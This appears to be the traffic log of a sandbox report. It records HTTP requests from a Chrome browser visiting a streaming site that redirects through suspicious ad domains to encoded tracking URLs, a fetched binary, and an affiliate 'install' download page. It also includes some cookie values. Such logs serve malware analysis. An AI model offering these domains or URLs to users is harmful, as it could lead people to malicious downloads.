Source: global trafficHTTP traffic detected: GET /push-wrap.js?b=8 HTTP/1.1Host: lgzmq.employmehnt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /block.js?b=4 HTTP/1.1Host: lgzmq.employmehnt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asd100.bin HTTP/1.1Host: ukankingwithea.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ysyyscafvj.jpg HTTP/1.1Host: images.fsharetv.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Ffavicon.ico%3F_rdr%3Dp HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://lgzmq.employmehnt.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNmVmYzcwNzMtMWM1NS00MWIyLThlMDEtYzUwZDgzODE1NmE2XkEyXkFqcGdeQXVyNzkwMjQ5NzM@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BY2UxYmJhNDctNGVlZi00NGJlLTkzMjItZGMzMTA2NTc2YTkyXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BM2FkM2U5MjYtMjkzNy00MDlkLWFiNzItOGJjZjQxMGViNjI3XkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BYmIxYzM5NGItMzQwMC00MDAzLThiZTItNDQxZWZlZmIwYTRkXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNDI0MWQyMzMtOGI4Ni00NTZlLTg0NTItNzQ5Y2UwYjdiOWZmXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMjI3MDRhNmEtMWMwNi00MjMxLWIzNzktOGE0NGY0ZTZkNzA4XkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMjZmOTU5ODAtZTZkMi00ODZkLTgxNGEtZTViYzFmNzAxYTU4XkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNDA2Y2EyNjMtNmJmOS00NjU2LWIxNTQtMzNiYmY1ZDZlZDY5XkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BY2M1ZTA0MTItZWNhYS00ZDAxLWIyMDQtMzIxNDg2N2NhYjcwXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BOWFmMWM3YWQtM2M2NC00ZmRkLTg4MTEtNjRiNDQ2NDk2MWJkXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BOWZkZTM2YjMtZDgxNy00ODFhLWEzOGEtZGUxZTZmZWVkMTEzXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BOGY0YTQ3M2UtZjA5MS00NDg3LTgwYzktM2FhNjhlYTRmNGZiXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BOTA3ZTRmYjQtMjQ1OS00YmY0LThlM2ItZWE4YzRiODU1NDIyXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BY2UxYmJhNDctNGVlZi00NGJlLTkzMjItZGMzMTA2NTc2YTkyXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BM2VjYzk1MzktNGIzOS00NmEyLWE2ODAtNTQyMmNkMzRlNjBhXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BM2FkM2U5MjYtMjkzNy00MDlkLWFiNzItOGJjZjQxMGViNjI3XkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BYmIxYzM5NGItMzQwMC00MDAzLThiZTItNDQxZWZlZmIwYTRkXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BOGEyZjQzMWUtNzE4Zi00Y2NhLWFkYzctNGZiNTQzY2VmYjBlXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMjZmOTU5ODAtZTZkMi00ODZkLTgxNGEtZTViYzFmNzAxYTU4XkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BY2M1ZTA0MTItZWNhYS00ZDAxLWIyMDQtMzIxNDg2N2NhYjcwXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ysyyscafvj.jpg HTTP/1.1Host: images.fsharetv.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BOWZkZTM2YjMtZDgxNy00ODFhLWEzOGEtZGUxZTZmZWVkMTEzXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/4.7.0/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://fsharetv.cosec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /WmFKYlZ1XikRazg0DxUFHAkuARcURHgkNxwRPSEONhAdKjEfBHhScC4ILl9nalh4UGFiRzoLMmdQbBEiOxU/EWtpRyMMMDVcJw0jKQQuDSE0RzxfZ3RSfkxlbE9+RCNnUGwWJjsGd1NwKhU+DmtrVnlWZGxTfFpuYldz HTTP/1.1Host: bineukdwithme.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BOTA3ZTRmYjQtMjQ1OS00YmY0LThlM2ItZWE4YzRiODU1NDIyXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BOGEyZjQzMWUtNzE4Zi00Y2NhLWFkYzctNGZiNTQzY2VmYjBlXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BM2VjYzk1MzktNGIzOS00NmEyLWE2ODAtNTQyMmNkMzRlNjBhXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /T29ORHpgUC03RwEpFHQ3NSYLHkosKg8jNCE7Hw07Djh3BTsODGgwEytSf3RDfV15fFw/Bip5S2kcOiUOOhxzcVwmASgrR2kZc3VUfFtgd0xhW2gxR35JOjQbKFJ/Ygo7GyJ5S3hcenZMfVl3dU19Ww HTTP/1.1Host: bineukdwithme.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/player/f8f53e1a/www-widgetapi.vflset/www-widgetapi.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=1K_n3-vIF0w; VISITOR_INFO1_LIVE=JvrfUCtMilg; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgGA%3D%3D
Source: global trafficHTTP traffic detected: GET /cVpnZHQqeFZUTUNoUFxWXXhFSFZGbFNQR0FqVFxCQWhRU0JEYlBTVl14XwAWFTsEVU1caVQAEVxuVV1BXGIDVEZcbgYHTUNqUgdDRmwGRlhTKRBGWFM2AB4ZAHQCCQQdNR4JERk0E0oXHjdFSFZAaklRVl08BggHFHYBBRgCP0sCFR0pAjk HTTP/1.1Host: lgzmq.employmehnt.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://lgzmq.employmehnt.com/UARUK?tag_id=1092278&sub_id1=&sub_id2=7644300386026765877&cookie_id=8dbdac19-33de-4295-8d02-4ac9205c776a&lp=not_robot_3&tb=redirect&allb=redirect&ob=redirect&href=https%3A%2F%2Fgetrunkhomuto.info%2F%3Ftid%3D1092278%26noocp%3D1&hop=7&geo=USUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: lgzmq.employmehnt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/player/f8f53e1a/www-widgetapi.vflset/www-widgetapi.js HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=4sc1jQW2Mr0; __Secure-ROLLOUT_TOKEN=CKbCy86lpvfbhAEQkpeLgNipigMYkpeLgNipigM%3D; VISITOR_INFO1_LIVE=xdtCrHe5nzM; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgUA%3D%3D
Source: global trafficHTTP traffic detected: GET /VVRhaFFqNxJVNA0OFAoZBxkwWTkMADRRFQM4DSYFPh4HPxQEcgAKJWhkRxo0MWlQTiI4aVBedz5pFgklNjxEWmE2OAAbIjw3RFphJiEDHDghOAQbdGdkDgY9PDoETWNlMhMNNHBmUR84ITxEWmE4OxcBNCZyF1Vge2dVRmJjelVOIiEnXFh3JSYPVWFzMQwKbGVyFQE1aGVRUWNnY1lOIy0tXFljbWQ%2BWWFnYEcBPzZpWU43JmlQTjw3PwNVZXtnVl1hZ2NSXGJsZlFRdycxB1U5ISARG3RmFURaF3BmJw4iPTUTDSUjegIHdGcSRwwiIThcACUhJBJNYhRxUy50ZxIHGzk0JgQcJ3s3Dk1jEzkOHjgwcVMuMjQnAAo9NDoCCXwwJAgbPjExTFl8ISBRWGJhYVlbdz8nFVVhczEPGmxlcg0LJDRpDAcrPDgNCXRnElRGYXBmUUAmPDoFByYmcVNYPyFxU1hgZXpRTWIXcVNYJjw6V1x0ZhZEWmEtYlVBdGdkABghOTEWDTM%2BPRVNYxNhUl9%2FZmJEWmF9PwkcPDlxUyt0Z2QNATowcVNYNjA3Cgd4cGZRCzknOwwNdGcSUFlme2RPWH9lcVNYIjQyABo4cGYnXWJielJedyEuBVV8YHIUBD42aUcBN2hkRwslaGFHCyU2aVBODmU2OQ5sZGNSXGNjZlZZY2ViWU4kISZQVWFlblFYa2VgRx0lJ2ZcXmdzIRUaYmhkRx0lJ2BcWHcgIBNdbGVyFBwjY2lRTiQhJlZVYXMiAAQ4MWlQ HTTP/1.1Host: getrunkhomuto.infoConnection: keep-alivedevice-memory: 8dpr: 1viewport-width: 1280sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALB=rmkwOR43HXje/6Bpdzgc6vHnoIR5wxjug/lfooeGUb0BqRy7nyyXahBKv5lVx29dIYGIEQhtxaNCFWX+k1uW54CYq+9QW9/YTRp68rnRC3yYAD7iMyb413LiKm4U
Source: global trafficHTTP traffic detected: GET /?affId=2923&o=473&s1=WW_Opera_Inst_55CPA_201024_LP2&t=download_s1&title=install&click_id=6854923038828080143&source=1092278&s2=649654 HTTP/1.1Host: birthjeans.icuConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
